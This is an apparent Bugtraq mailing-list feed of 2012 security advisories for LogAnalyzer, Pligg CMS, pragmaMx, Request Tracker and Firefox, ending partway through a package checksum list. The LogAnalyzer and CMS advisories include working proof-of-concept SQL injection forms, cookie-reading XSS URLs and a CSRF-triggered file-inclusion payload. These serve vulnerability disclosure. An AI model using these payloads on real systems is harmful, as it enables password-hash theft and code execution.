gmane.comp.security.bugtraq
http://blog.gmane.org/gmane.comp.security.bugtraq
hourly11901-01-01T00:00+00:00Gmanehttp://gmane.org/img/gmane-25t.png
http://gmane.org
Multiple vulnerabilities in LogAnalyzer
http://permalink.gmane.org/gmane.comp.security.bugtraq/49750
<pre>Advisory ID:CSA-12005
Title:Multiple vulnerabilities in LogAnalyzer
Product:LogAnalyzer
Version:3.4.2 and probably prior
Vendor:adiscon.com
Vulnerability type:SQL injection, XSS, Arbitrary File Read
Risk level:2 / 3
Credit:www.codseq.it
CVE:
Vendor notification:2012-05-21
Public disclosure:2012-05-23
Details
LogAnalyzer version 3.4.2 and probably below suffers from multiple vulnerabilities:
- SQL Injection
1) The script admin/views.php contains a SQL-Injection vulnerability when used to create a new view. It can be exploited by a non-admin user (with write access) to insert arbitrary data into logcon_views table.
The vulnerability exists due to the failure in the script to sanytize the POST variable "Columns" before use it to build a SQL query.
This PoC creates an arbitrary record into logcon_views table.
<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php">
<input name="DisplayName" value="dontcare">
<input name="isuseronly" value="2">
<input name="Columns[]" value="',2,null) ,('arbitrary','',1,2), ('dontcare2','">
<input name="op" value="addnewview">
<input type=submit value="go!">
</form>
2) The script admin/views.php contains a SQL-Injection vulnerability when used to update a view. It can be exploited by a non-admin user (with write access) to obtain arbitrary database data.
The vulnerability exists due to the failure in the script to sanytize the POST variable "Columns" before use it to build a SQL query.
This PoC updates a view and sets the admin password (md5) as the view name
<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php">
<input name="DisplayName" value="dontcare">
<input name="isuseronly" value="2">
<input name="Columns[]" value="',DisplayName=(select password from logcon_users where username='admin'),Columns='">
<input name="op" value="editview">
<input name="id" value="1">
<input type=submit value="go!">
</form>
- Arbitrary File Read
LogAnalyzer allows non-admin users (with write access) to create a diskfile source with an arbitrary value as "syslog file" parameter. By setting this parameter to "config.php", the configuration file is disclosed when the source is loaded.
- Cross Site Scripting
1) The input passed via the "filter" parameter to index.php is not properly sanitised before being returned to the user.
http://127.0.0.1/loganalyzer-3.4.2/index.php?filter=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E
2) The input passed via the "id" parameter to admin/reports.php is not properly sanitised before being returned to the user.
http://127.0.0.1/loganalyzer-3.4.2/admin/reports.php?op=details&id=eventsummary%3Cscript%3Ealert(1)%3C/script%3E
3) The input passed via the "id" parameter to admin/searches.php is not properly sanitised before being returned to the user.
http://127.0.0.1/loganalyzer-3.4.2/admin/searches.php?op=edit&id=7%3Cscript%3Ealert(1)%3C/script%3E
Solution
upgrade to LogAnalyzer 3.4.3
Filippo Cavallarin
C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin< at >codseq.it
</pre>Filippo Cavallarin2012-05-23T12:10:25Multiple vulnerabilities in Pligg CMS
http://permalink.gmane.org/gmane.comp.security.bugtraq/49749
<pre>Advisory ID: HTB23089
Product: Pligg CMS
Vendor: Pligg, LLC.
Vulnerable Version(s): 1.2.1 and probably prior
Tested Version: 1.2.1
Vendor Notification: 25 April 2012
Vendor Patch: 18 May 2012
Public Disclosure: 23 May 2012
Vulnerability Type: Local File Inclusion, Cross-Site Scripting (XSS)
CVE References: CVE-2012-2435, CVE-2012-2436
Solution Status: Fixed by Vendor
Risk Level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pligg CMS , which can be exploited to perform Cross-Site Scripting (XSS) and Local File Inclusion attacks.
1) Multiple Cross-Site Scripting (XSS) in Pligg CMS: CVE-2012-2436
1.1 Input passed via the arbitrary (any) GET parameter to /admin/admin_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/admin/admin_index.php?action=move&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admin/admin_index.php?action=minimize&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.2 Input passed via the "karma_username" POST parameter to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/module.php?module=karma" method="post" name="main" id="main">
<input type="hidden" name="karma_value" value="1">
<input type="hidden" name="karma_username" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" id="btn" value="submit">
</form>
1.3 Input passed via the "q_1_low". "q_1_high", "q_2_low", "q_2_high" GET parameters to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_low=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_high=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_low=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_high=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.4 Input passed via the "edit" GET parameter to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/module.php?module=admin_language&mode=edit&edit=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
2) Local File Inclusion in Pligg CMS: CVE-2012-2435
2.1 Input passed via the "captcha" GET parameter to module.php is not properly verified before being used in include_once() function and can be exploited to include arbitrary or previously uploaded local files. This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes, however successful exploitation of this vulnerability requires administrative privileges. Therefore the most appropriate vector of exploitation is CSRF.
The attacker should register in the system, upload a ".jpg" avatar with malicious content (e.g. PHP webshell upload) and make logged-in administrator visiting specially crafted web page that will exploit Local File Inclusion via CSRF. For example this PoC (Proof of Concept):
<img src="http://[host]/module.php?module=captcha&action=configure&captcha=../../../avatars/user_uploaded/[USER_ID]_original.jpg%00">
Successful exploitation of this vulnerability requires that "magic_quotes_gpc" is off.
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to Pligg CMS 1.2.2
More Information: http://forums.pligg.com/downloads.php?do=file&id=15
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple vulnerabilities in Pligg CMS.
[2] Pligg CMS - http://pligg.com - Pligg is an open source CMS (Content Management System) that you can download and use for free.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
</pre>advisory< at >htbridge.com2012-05-23T10:07:42Multiple XSS in pragmaMx
http://permalink.gmane.org/gmane.comp.security.bugtraq/49748
<pre>Advisory ID: HTB23090
Product: pragmaMx
Vendor: pragmaMx Team
Vulnerable Version(s): 1.12.1 and probably prior
Tested Version: 1.12.1
Vendor Notification: 2 May 2012
Vendor Patch: 4 May 2012
Public Disclosure: 23 May 2012
Vulnerability Type: Cross-Site Scripting (XSS)
CVE Reference: CVE-2012-2452
Solution Status: Fixed by Vendor
Risk Level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in pragmaMx, which can be exploited to perform Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in pragmaMx: CVE-2012-2452
1.1 Input passed via a name of a GET parameter to modules.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/modules.php?name=Themetest&%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
1.2 Input passed via the "img_url" GET parameter to /includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to pragmaMx 1.12.2
More Information:
http://www.pragmamx.org/Forum-topic-33554.html
http://www.pragmamx.org/News-pragmaMx-1.12-Servicepack2-item-706.html
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23090 - https://www.htbridge.com/advisory/HTB23090 - Multiple XSS in pragmaMx.
[2] pragmaMx - http://www.pragmamx.org/ - pragmaMx is a content management system written in PHP.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
</pre>advisory< at >htbridge.com2012-05-23T10:07:34[SECURITY] [DSA 2480-1] request-tracker3.8 security update
http://permalink.gmane.org/gmane.comp.security.bugtraq/49747
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2480-1 security< at >debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
May 24, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : request-tracker3.8
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE ID : CVE-2011-2082 CVE-2011-2083 CVE-2011-2084 CVE-2011-2085
CVE-2011-4458 CVE-2011-4459 CVE-2011-4460
Several vulnerabilities were discovered in Request Tracker, an issue
tracking system:
CVE-2011-2082
The vulnerable-passwords scripts introduced for CVE-2011-0009
failed to correct the password hashes of disabled users.
CVE-2011-2083
Several cross-site scripting issues have been discovered.
CVE-2011-2084
Password hashes could be disclosed by privileged users.
CVE-2011-2085
Several cross-site request forgery vulnerabilities have been
found. If this update breaks your setup, you can restore the old
behaviour by setting $RestrictReferrer to 0.
CVE-2011-4458
The code to support variable envelope return paths allowed the
execution of arbitrary code.
CVE-2011-4459
Disabled groups were not fully accounted as disabled.
CVE-2011-4460
SQL injection vulnerability, only exploitable by privileged users.
For the stable distribution (squeeze), this problem has been fixed in
version 3.8.8-7+squeeze2.
For the unstable distribution (sid), this problem has been fixed in
version 4.0.5-3.
We recommend that you upgrade your request-tracker3.8 packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAk++cYMACgkQXm3vHE4uylokxACguQb84ehN2ODvrYW4Mr1CmOLY
XIkAoJ/DIybBV9MxZA7txyMDE56vsWeM
=+4ft
-----END PGP SIGNATURE-----
</pre>Moritz Muehlenhoff2012-05-24T17:37:03[ MDVSA-2012:081 ] firefox
http://permalink.gmane.org/gmane.comp.security.bugtraq/49746
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2012:081
http://www.mandriva.com/security/
_______________________________________________________________________
Package : firefox
Date : May 24, 2012
Affected: Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Security issues were identified and fixed in mozilla firefox:
Mozilla developers identified and fixed several memory safety
bugs in the browser engine used in Firefox and other Mozilla-based
products. Some of these bugs showed evidence of memory corruption
under certain circumstances, and we presume that with enough effort
at least some of these could be exploited to run arbitrary code
(CVE-2012-0468, CVE-2012-0467).
Using the Address Sanitizer tool, security researcher Aki Helin from
OUSPG found that IDBKeyRange of indexedDB remains in the XPConnect
hashtable instead of being unlinked before being destroyed. When
it is destroyed, this causes a use-after-free, which is potentially
exploitable (CVE-2012-0469).
Using the Address Sanitizer tool, security researcher Atte Kettunen
from OUSPG found a heap corruption in gfxImageSurface which allows for
invalid frees and possible remote code execution. This happens due
to float error, resulting from graphics values being passed through
different number systems (CVE-2012-0470).
Anne van Kesteren of Opera Software found a multi-octet encoding
issue where certain octets will destroy the following octets in the
processing of some multibyte character sets. This can leave users
vulnerable to cross-site scripting (XSS) attacks on maliciously
crafted web pages (CVE-2012-0471).
Security research firm iDefense reported that researcher wushi of
team509 discovered a memory corruption on Windows Vista and Windows
7 systems with hardware acceleration disabled or using incompatible
video drivers. This is created by using cairo-dwrite to attempt to
render fonts on an unsupported code path. This corruption causes a
potentially exploitable crash on affected systems (CVE-2012-0472).
Mozilla community member Matias Juntunen discovered an error in
WebGLBuffer where FindMaxElementInSubArray receives wrong template
arguments from FindMaxUshortElement. This bug causes maximum index
to be computed incorrectly within WebGL.drawElements, allowing the
reading of illegal video memory (CVE-2012-0473).
Security researchers Jordi Chancel and Eddy Bordi reported that they
could short-circuit page loads to show the address of a different
site than what is loaded in the window in the addressbar. Security
researcher Chris McGowen independently reported the same flaw, and
further demonstrated that this could lead to loading scripts from
the attacker&#039;s site, leaving users vulnerable to cross-site scripting
(XSS) attacks (CVE-2012-0474).
Security researcher Masato Kinugawa found that during the decoding
of ISO-2022-KR and ISO-2022-CN character sets, characters near 1024
bytes are treated incorrectly, either doubling or deleting bytes. On
certain pages it might be possible for an attacker to pad the output of
the page such that these errors fall in the right place to affect the
structure of the page, allowing for cross-site script (XSS) injection
(CVE-2012-0477).
Mozilla community member Ms2ger found an image rendering issue
with WebGL when texImage2D uses use JSVAL_TO_OBJECT on arbitrary
objects. This can lead to a crash on a maliciously crafted web
page. While there is no evidence that this is directly exploitable,
there is a possibility of remote code execution (CVE-2012-0478).
Mateusz Jurczyk of the Google Security Team discovered an off-by-one
error in the OpenType Sanitizer using the Address Sanitizer tool. This
can lead to an out-of-bounds read and execution of an uninitialized
function pointer during parsing and possible remote code execution
(CVE-2011-3062).
Security researcher Jeroen van der Gun reported that if RSS or Atom
XML invalid content is loaded over HTTPS, the addressbar updates
to display the new location of the loaded resource, including SSL
indicators, while the main window still displays the previously loaded
content. This allows for phishing attacks where a malicious page can
spoof the identify of another seemingly secure site (CVE-2012-0479).
Additionally the OpenJDK java plugin (icedtea-web) has been upgraded
to the 1.1.5 version which has better support for firefox 10.x+.
The mozilla firefox packages has been upgraded to the latest version
(10.0.4) which is unaffected by these security flaws.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0468
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0467
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0471
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0472
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0473
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0474
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0477
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3062
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0479
http://www.mozilla.org/security/announce/2012/mfsa2012-20.html
http://www.mozilla.org/security/announce/2012/mfsa2012-22.html
http://www.mozilla.org/security/announce/2012/mfsa2012-23.html
http://www.mozilla.org/security/announce/2012/mfsa2012-24.html
http://www.mozilla.org/security/announce/2012/mfsa2012-25.html
http://www.mozilla.org/security/announce/2012/mfsa2012-26.html
http://www.mozilla.org/security/announce/2012/mfsa2012-27.html
http://www.mozilla.org/security/announce/2012/mfsa2012-29.html
http://www.mozilla.org/security/announce/2012/mfsa2012-30.html
http://www.mozilla.org/security/announce/2012/mfsa2012-31.html
http://www.mozilla.org/security/announce/2012/mfsa2012-33.html
_______________________________________________________________________
Updated Packages:
Mandriva Enterprise Server 5:
193b2b0679d513564e53284307f2102b mes5/i586/firefox-10.0.4-0.1mdvmes5.2.i586.rpm
6b2a368e5f7dd9d8b4c82d1a2cd14d57 mes5/i586/firefox-af-10.0.4-0.1mdvmes5.2.i586.rpm
fed44fb471b0c182dab2a9d83e1d5a8a mes5/i586/firefox-ar-10.0.4-0.1mdvmes5.2.i586.rpm
e934b53194435db948ddf167feeabff2 mes5/i586/firefox-be-10.0.4-0.1mdvmes5.2.i586.rpm
1029a3368c2e03c6e5fca29d919b95b1 mes5/i586/firefox-bg-10.0.4-0.1mdvmes5.2.i586.rpm
0acffa710c2ffd613248a5fea527a2c6 mes5/i586/firefox-bn-10.0.4-0.1mdvmes5.2.i586.rpm
fe36d262aa3837c06daf4c6d69b84108 mes5/i586/firefox-ca-10.0.4-0.1mdvmes5.2.i586.rpm
c6d115880df0d6c1587797c31fba8879 mes5/i586/firefox-cs-10.0.4-0.1mdvmes5.2.i586.rpm
9f581bb0b11552d002b3c399b7531968 mes5/i586/firefox-cy-10.0.4-0.1mdvmes5.2.i586.rpm
51ed7ecfcf67292847315994a746bbf3 mes5/i586/firefox-da-10.0.4-0.1mdvmes5.2.i586.rpm
94d85793d298a3eb8c75cebd898fbd6c mes5/i586/firefox-de-10.0.4-0.1mdvmes5.2.i586.rpm
3a880a7e39bac5a9b9fc160d51046b19 mes5/i586/firefox-devel-10.0.4-0.1mdvmes5.2.i586.rpm
1b604c75e4fd7e302ed2627a8147e7c1 mes5/i586/firefox-el-10.0.4-0.1mdvmes5.2.i586.rpm
efe949479fa2eaeb7a5be876caaa5049 mes5/i586/firefox-en_GB-10.0.4-0.1mdvmes5.2.i586.rpm
4c787581a75a5a8a5a14b4a3a20280f2 mes5/i586/firefox-eo-10.0.4-0.1mdvmes5.2.i586.rpm
646f56e3b288de9f1e39947f05969014 mes5/i586/firefox-es_AR-10.0.4-0.1mdvmes5.2.i586.rpm
3185f5ea5ba41dc9251617ff103841ab mes5/i586/firefox-es_ES-10.0.4-0.1mdvmes5.2.i586.rpm
241655d4834edc69928640717ecedd60 mes5/i586/firefox-et-10.0.4-0.1mdvmes5.2.i586.rpm
7c42f3b9eda430e9cc71bcec89a4a988 mes5/i586/firefox-eu-10.0.4-0.1mdvmes5.2.i586.rpm
808b3c7dcd7e3fdd638dcaf85ea92710 mes5/i586/firefox-fi-10.0.4-0.1mdvmes5.2.i586.rpm
4ca2cec95c0eb52b8cf0ddbc417d6fb7 mes5/i586/firefox-fr-10.0.4-0.1mdvmes5.2.i586.rpm
7e466b6cdee00044853b5d904de982b0 mes5/i586/firefox-fy-10.0.4-0.1mdvmes5.2.i586.rpm
2386807b47816840462a48f4307b73da mes5/i586/firefox-ga_IE-10.0.4-0.1mdvmes5.2.i586.rpm
39d9141bb98506677c406b350195571a mes5/i586/firefox-gl-10.0.4-0.1mdvmes5.2.i586.rpm
6d15fbe0824957df7248eb387c3703aa mes5/i586/firefox-gu_IN-10.0.4-0.1mdvmes5.2.i586.rpm
aae9db3b4a6b0fb4eb590454368aa7fc mes5/i586/firefox-he-10.0.4-0.1mdvmes5.2.i586.rpm
f196eab619bc51ef64f97bb620814253 mes5/i586/firefox-hi-10.0.4-0.1mdvmes5.2.i586.rpm
f069a4806971ea41b48d2af769d93132 mes5/i586/firefox-hu-10.0.4-0.1mdvmes5.2.i586.rpm
a3beac338a793a0a287fc1862462d068 mes5/i586/firefox-id-10.0.4-0.1mdvmes5.2.i586.rpm
6123e1459dc5b0bbe63b674d33995693 mes5/i586/firefox-is-10.0.4-0.1mdvmes5.2.i586.rpm
d73c85d5eefe09d6a3e91d0ccdb8d622 mes5/i586/firefox-it-10.0.4-0.1mdvmes5.2.i586.rpm
aaf9b48f8716e095ec7df1d19cad69c7 mes5/i586/firefox-ja-10.0.4-0.1mdvmes5.2.i586.rpm
cfa80f3ff847df2992fbb6405454e7ca mes5/i586/firefox-ka-10.0.4-0.1mdvmes5.2.i586.rpm
4fca93a01e923f4eb358aefc692cad67 mes5/i586/firefox-kn-10.0.4-0.1mdvmes5.2.i586.rpm
6ee5808baeff6813bd76e33e4f18d28e mes5/i586/firefox-ko-10.0.4-0.1mdvmes5.2.i586.rpm
0effcc290c9c326724ccfa28e7139ada mes5/i586/firefox-ku-10.0.4-0.1mdvmes5.2.i586.rpm
cc7675d4172f14c8940b49bbf61bb18e mes5/i586/firefox-lt-10.0.4-0.1mdvmes5.2.i586.rpm
a60078f103dfd3075d95097a31d62bd5 mes5/i586/firefox-lv-10.0.4-0.1mdvmes5.2.i586.rpm
2e2046d3e59ea8be6fa5eb4b45addb72 mes5/i586/firefox-mk-10.0.4-0.1mdvmes5.2.i586.rpm
f7ffed193940d943ae9631a6e8692eef mes5/i586/firefox-mr-10.0.4-0.1mdvmes5.2.i586.rpm
a9a6d3315312d9a6f4d5909e1b906b8f mes5/i586/firefox-nb_NO-10.0.4-0.1mdvmes5.2.i586.rpm
b632687cb2e381baba9c02421aadadfe mes5/i586/firefox-nl-10.0.4-0.1mdvmes5.2.i586.rpm
a9d63c103db37373a86e0e5648894987 mes5/i586/firefox-nn_NO-10.0.4-0.1mdvmes5.2.i586.rpm
84f88308a0db841160a2a0dd18aee4a1 mes5/i586/firefox-oc-10.0.4-0.1mdvmes5.2.i586.rpm
4dcc39e7525ccba672726c7f3cae8168 mes5/i586/firefox-pa_IN-10.0.4-0.1mdvmes5.2.i586.rpm
052c9e85efea6f6ed62ea53f5472e53b mes5/i586/firefox-pl-10.0.4-0.1mdvmes5.2.i586.rpm
77c518708e77a54817935af188e55477 mes5/i586/firefox-pt_BR-10.0.4-0.1mdvmes5.2.i586.rpm
99f055ac36c6d7fe56b9f3a6009d08da mes5/i586/firefox-pt_PT-10.0.4-0.1mdvmes5.2.i586.rpm
a442c67bf58bb90b96a54a234f24bd72 mes5/i586/firefox-ro-10.0.4-0.1mdvmes5.2.i586.rpm
164d1c5a9a15abf1063634159deba9f2 mes5/i586/firefox-ru-10.0.4-0.1mdvmes5.2.i586.rpm
32df9fd644919935a2bfbcc7421cd204 mes5/i586/firefox-si-10.0.4-0.1mdvmes5.2.i586.rpm
d80be6f7b223a2deaae25f6dec1b6370 mes5/i586/firefox-sk-10.0.4-0.1mdvmes5.2.i586.rpm
f4b629c6a8e892cb8571219f13879783 mes5/i586/firefox-sl-10.0.4-0.1mdvmes5.2.i586.rpm
cc1b2f9cf959bfbc96e5856d89b5adb8 mes5/i586/firefox-sq-10.0.4-0.1mdvmes5.2.i586.rpm
237d759dc2018d4b18e3d475709c8041 mes5/i586/firefox-sr-10.0.4-0.1mdvmes5.2.i586.rpm
7d79a7670c7833b7c2334f8ba55db0d4 mes5/i586/firefox-sv_SE-10.0.4-0.1mdvmes5.2.i586.rpm
d0ee70491cc8125fbbdf4256a635bd59 mes5/i586/firefox-te-10.0.4-0.1mdvmes5.2.i586.rpm
db978375a4a46f4d4d7c9e352a0a72cb mes5/i586/firefox-th-10.0.4-0.1mdvmes5.2.i586.rpm
d68633a0b80316f2893b15ad9c6b8fe7 mes5/i586/firefox-tr-10.0.4-0.1mdvmes5.2.i586.rpm
0a8b368dd05e641df6a2c78098a180e1 mes5/i586/firefox-uk-10.0.4-0.1mdvmes5.2.i586.rpm
66658c77030de0388b00260f8c344f47 mes5/i586/firefox-zh_CN-10.0.4-0.1mdvmes5.2.i586.rpm
c188b5e42b350bbd55493bdcde83860c mes5/i586/firefox-zh_TW-10.0.4-0.1mdvmes5.2.i586.rpm
30bfd413c74c33b9015d15cd3d9ada2b mes5/i586/icedtea-web-1.1.5-0.1mdvmes5.2.i586.rpm
70fca946067f3e89d68c32f5f6a9006a mes5/i586/icedtea-web-javadoc-1.1.5-0.1mdvmes5.2.i586.rpm
41534a23821ffaf40bee803faf0ec983 mes5/i586/libiw29-29-3.1mnb2.i586.rpm
19a2baf2b5445c8d4accbbbda1e4a6bd mes5/i586/libiw29-devel-29-3.1mnb2.i586.rpm
9cc77cc785d29e3e30bcf0c160c76799 mes5/i586/libvpx0-0.9.7-0.2mdvmes5.2.i586.rpm
a826b46bb2e25beed537a72ca05a9e20 mes5/i586/libvpx-devel-0.9.7-0.2mdvmes5.2.i586.rpm
c14d94ba2816633883c013303014a0b2 mes5/i586/libvpx-utils-0.9.7-0.2mdvmes5.2.i586.rpm
d579056b5b169241daf27841cc013790 mes5/i586/libxulrunner10.0.4-10.0.4-0.1mdvmes5.2.i586.rpm
adf745f8a727f3bcba53e596fd88950a mes5/i586/libxulrunner-devel-10.0.4-0.1mdvmes5.2.i586.rpm
9ea303afba3bb08905f6421b6493ecd4 mes5/i586/python-cython-0.15-0.1mdvmes5.2.i586.rpm
e56c57897156842a7ba4f90c472a47c9 mes5/i586/wireless-tools-29-3.1mnb2.i586.rpm
a0329158463abcbad918047c84186141 mes5/i586/xulrunner-10.0.4-0.1mdvmes5.2.i586.rpm
1e93694bd386fa384d62db462e0a4031 mes5/i586/yasm-1.1.0-0.1mdvmes5.2.i586.rpm
32ded032cb69d5c70178f9651d62e10b mes5/i586/yasm-devel-1.1.0-0.1mdvmes5.2.i586.rpm
feab3a138317b8df1d7a72eba74b2543 mes5/i586/yasm-python-1.1.0-0.1mdvmes5.2.i586.rpm
cab2fb3795af9ee2b730ab4609ff5d38 mes5/SRPMS/firefox-10.0.4-0.1mdvmes5.2.src.rpm
bd3fbc028e30d73714793c5fb08f8609 mes5/SRPMS/firefox-l10n-10.0.4-0.1mdvmes5.2.src.rpm
2522a91d944b8156c3ddb82fccc25539 mes5/SRPMS/icedtea-web-1.1.5-0.1mdvmes5.2.src.rpm
78481843cb9aa5279b0975d75242e809 mes5/SRPMS/libvpx-0.9.7-0.2mdvmes5.2.src.rpm
6d47b4c4cd98073ed9435bae941dd665 mes5/SRPMS/python-cython-0.15-0.1mdvmes5.2.src.rpm
34c2cc5a16145dfcc969c0224bffdae4 mes5/SRPMS/wireless-tools-29-3.1mnb2.src.rpm
e4f47ab68daf56f0a376ed5de58219cb mes5/SRPMS/xulrunner-10.0.4-0.1mdvmes5.2.src.rpm
38698452301ff1bd0eb5fb221a9d35d2 mes5/SRPMS/yasm-1.1.0-0.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64:
72143cae4c12bbf399202a03cfbc05cd mes5/x86_64/firefox-10.0.4-0.1mdvmes5.2.x86_64.rpm
d160a5a991f647a5bd6b4c0dd3562266 mes5/x86_64/firefox-af-10.0.4-0.1mdvmes5.2.x86_64.rpm
8753f1bbe4100b5f0314470a0cae3d8c mes5/x86_64/firefox-ar-10.0.4-0.1mdvmes5.2.x86_64.rpm
ff9d47d7ff3fd90958f9e951d0c76da9 mes5/x86_64/firefox-be-10.0.4-0.1mdvmes5.2.x86_64.rpm
35393856a12c8a6328726619eb303126 mes5/x86_64/firefox-bg-10.0.4-0.1mdvmes5.2.x86_64.rpm
4b6e778539052f275cb9b7bc09a6c4ae mes5/x86_64/firefox-bn-10.0.4-0.1mdvmes5.2.x86_64.rpm
0531167486bb429a92e35373d6b76fc2 mes5/x86_64/firefox-ca-10.0.4-0.1mdvmes5.2.x86_64.rpm
60d0cdcc11d04d0d6f26c2cd62f8a4d0 mes5/x86_64/firefox-cs-10.0.4-0.1mdvmes5.2.x86_64.rpm
63e3ae053f255455b50f1e6a1bfdd3c4 mes5/x86_64/firefox-cy-10.0.4-0.1mdvmes5.2.x86_64.rpm
b64491e5877443ca01497b98e39b68a7 mes5/x86_64/firefox-da-10.0.4-0.1mdvmes5.2.x86_64.rpm
5fd25b8b8147bc793951578d423f5595 mes5/x86_64/firefox-de-10.0.4-0.1mdvmes5.2.x86_64.rpm
69ec5adbb4ca050933956de9ff2f65fd mes5/x86_64/firefox-devel-10.0.4-0.1mdvmes5.2.x86_64.rpm
2c9dae2af88ffef107c7c7ad8c109e66 mes5/x86_64/firefox-el-10.0.4-0.1mdvmes5.2.x86_64.rpm
a11181e8b5534c94e5e895bd91697060 mes5/x86_64/firefox-en_GB-10.0.4-0.1mdvmes5.2.x86_64.rpm
2366be0bea1669c7556b3edb18a19cb6 mes5/x86_64/firefox-eo-10.0.4-0.1mdvmes5.2.x86_64.rpm
8d8816da7fe34870c0f1e1a2064b8560 mes5/x86_64/firefox-es_AR-10.0.4-0.1mdvmes5.2.x86_64.rpm
c53a83000c1f5e88e799b3a20176b1e6 mes5/x86_64/firefox-es_ES-10.0.4-0.1mdvmes5.2.x86_64.rpm
6d266df455ecc2a407ff1b3db3b62316 mes5/x86_64/firefox-et-10.0.4-0.1mdvmes5.2.x86_64.rpm
56e606eb0283317a74ac495bc93db377 mes5/x86_64/firefox-eu-10.0.4-0.1mdvmes5.2.x86_64.rpm
1ee31760392f7e567842fc60823af9d6 mes5/x86_64/firefox-fi-10.0.4-0.1mdvmes5.2.x86_64.rpm
